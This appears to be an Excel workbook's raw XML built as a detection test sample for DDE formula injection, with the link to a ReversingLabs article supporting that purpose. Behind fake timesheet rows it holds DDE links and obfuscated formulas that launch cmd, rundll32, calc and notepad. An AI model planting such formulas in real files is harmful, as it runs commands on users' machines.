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mitry\Desktop\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{ABA984C0-0836-4031-9350-5C809CF6F73F}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="1170" yWindow="1170" windowWidth="21600" windowHeight="11385" activeTab="2" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="csv" sheetId="1" r:id="rId1"/>
    <sheet name="sum-cmd" sheetId="2" r:id="rId2"/>
    <sheet name="Sheet1" sheetId="3" r:id="rId3"/>
  </sheets>
  <externalReferences>
    <externalReference r:id="rId4"/>
    <externalReference r:id="rId5"/>
    <externalReference r:id="rId6"/>
    <externalReference r:id="rId7"/>
    <externalReference r:id="rId8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3" l="1"/>
  <c r="H1" i="2" a="1"/>
  <c r="H1" i="2" s="1"/>
  <c r="F1" i="2" a="1"/>
  <c r="F1" i="2" s="1"/>
  <c r="E1" i="2" a="1"/>
  <c r="E1" i="2" s="1"/>
  <c r="D1" i="2" a="1"/>
  <c r="D1" i="2"/>
  <c r="C1" i="2" a="1"/>
  <c r="C1" i="2" s="1"/>
  <c r="A1" i="2" a="1"/>
  <c r="A1" i="2" s="1"/>
  <c r="B1" i="2" a="1"/>
  <c r="B1" i="2" s="1"/>
  <c r="D4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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="11" uniqueCount="10">
  <si>
    <t>UserId</t>
  </si>
  <si>
    <t>BillToDate</t>
  </si>
  <si>
    <t>ProjectName</t>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>DurationMinutes</t>
  </si>
  <si>
    <t>Test Project</t>
  </si>
  <si>
    <t>Flipped the jibbet</t>
  </si>
  <si>
    <t>Important Client</t>
  </si>
  <si>
    <t>Bop, dop, and giglip</t>
  </si>
  <si>
    <t>=    C    m   D                    |        '/        c       c  al  c      .  e                  x       e  '   !  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</si>
</sst>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5">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="14" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" quotePrefix="1"/>
    <xf numFmtId="0" fontId="19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cmd" ddeTopic=" /C calc">
    <ddeItems>
      <ddeItem name="A0" advise="1"/>
      <ddeItem name="StdDocumentName" ole="1" advise="1"/>
    </ddeItems>
  </ddeLin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cmd" ddeTopic=" /C notepad">
    <ddeItems>
      <ddeItem name="_xlbgnm.A1" advise="1"/>
      <ddeItem name="StdDocumentName" ole="1" advise="1"/>
    </ddeItems>
  </ddeLin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cmd" ddeTopic="/c calc.exe">
    <ddeItems>
      <ddeItem name="A" advise="1"/>
      <ddeItem name="StdDocumentName" ole="1" advise="1"/>
    </ddeItems>
  </ddeLin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rundll32" ddeTopic="URL.dll,OpenURL calc.exe">
    <ddeItems>
      <ddeItem name="A" advise="1"/>
      <ddeItem name="StdDocumentName" ole="1" advise="1"/>
    </ddeItems>
  </ddeLin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rundll321234567890abcdefghijklmnopqrstuvwxyz" ddeTopic="URL.dll,OpenURL calc.exe">
    <ddeItems>
      <ddeItem name="A" advise="1"/>
      <ddeItem name="StdDocumentName" ole="1" advise="1"/>
    </ddeItems>
  </dd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workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr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</v>
      </c>
      <c r="B2" s="1">
        <v>42941</v>
      </c>
      <c r="C2" t="s">
        <v>5</v>
      </c>
      <c r="D2" t="s">
        <v>6</v>
      </c>
      <c r="E2">
        <v>60</v>
      </c>
    </row>
    <row r="3" spans="1:5">
      <c r="A3">
        <v>2</v>
      </c>
      <c r="B3" s="1">
        <v>42941</v>
      </c>
      <c r="C3" t="s">
        <v>7</v>
      </c>
      <c r="D3" t="s">
        <v>8</v>
      </c>
      <c r="E3">
        <v>240</v>
      </c>
    </row>
    <row r="4" spans="1:5">
      <c r="A4">
        <v>2</v>
      </c>
      <c r="B4" s="1">
        <v>42941</v>
      </c>
      <c r="C4" t="s">
        <v>7</v>
      </c>
      <c r="D4" t="e">
        <f>2+5+[1]!A0</f>
        <v>#REF!</v>
      </c>
      <c r="E4">
        <v>240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"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="H2" sqref="H2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15"/>
  <sheetData>
    <row r="1" spans="1:8">
      <c r="A1" t="e" cm="1">
        <f t="array" ref="A1">SUM(1+1)*[1]!A0</f>
        <v>#REF!</v>
      </c>
      <c r="B1" s="2" t="e" cm="1">
        <f t="array" ref="B1">2+5+[1]!A0</f>
        <v>#REF!</v>
      </c>
      <c r="C1" t="e" cm="1">
        <f t="array" ref="C1">[2]!_xlbgnm.A1</f>
        <v>#REF!</v>
      </c>
      <c r="D1" t="e" cm="1">
        <f t="array" ref="D1" xml:space="preserve">         [3]!A</f>
        <v>#REF!</v>
      </c>
      <c r="E1" t="e" cm="1">
        <f t="array" ref="E1">[4]!A</f>
        <v>#REF!</v>
      </c>
      <c r="F1" t="e" cm="1">
        <f t="array" ref="F1">[5]!A</f>
        <v>#REF!</v>
      </c>
      <c r="G1" s="3" t="s">
        <v>9</v>
      </c>
      <c r="H1" t="e" cm="1">
        <f t="array" aca="1" ref="H1" ca="1">+thespanishinquisition([3]!A)</f>
        <v>#NAME?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9C856-CC0E-44B2-B8D6-6F7BD3544F5E}">
  <dimension ref="A1"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15"/>
  <sheetData>
    <row r="1" spans="1:1">
      <c r="A1" s="4" t="str">
        <f>HYPERLINK("https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation", "yara")</f>
        <v>yara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csv</vt:lpstr>
      <vt:lpstr>sum-cmd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dmitry</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-10-20T06:53:17Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-20T07:14:35Z</dcterms:modified>
</cp:coreProperties>
</file>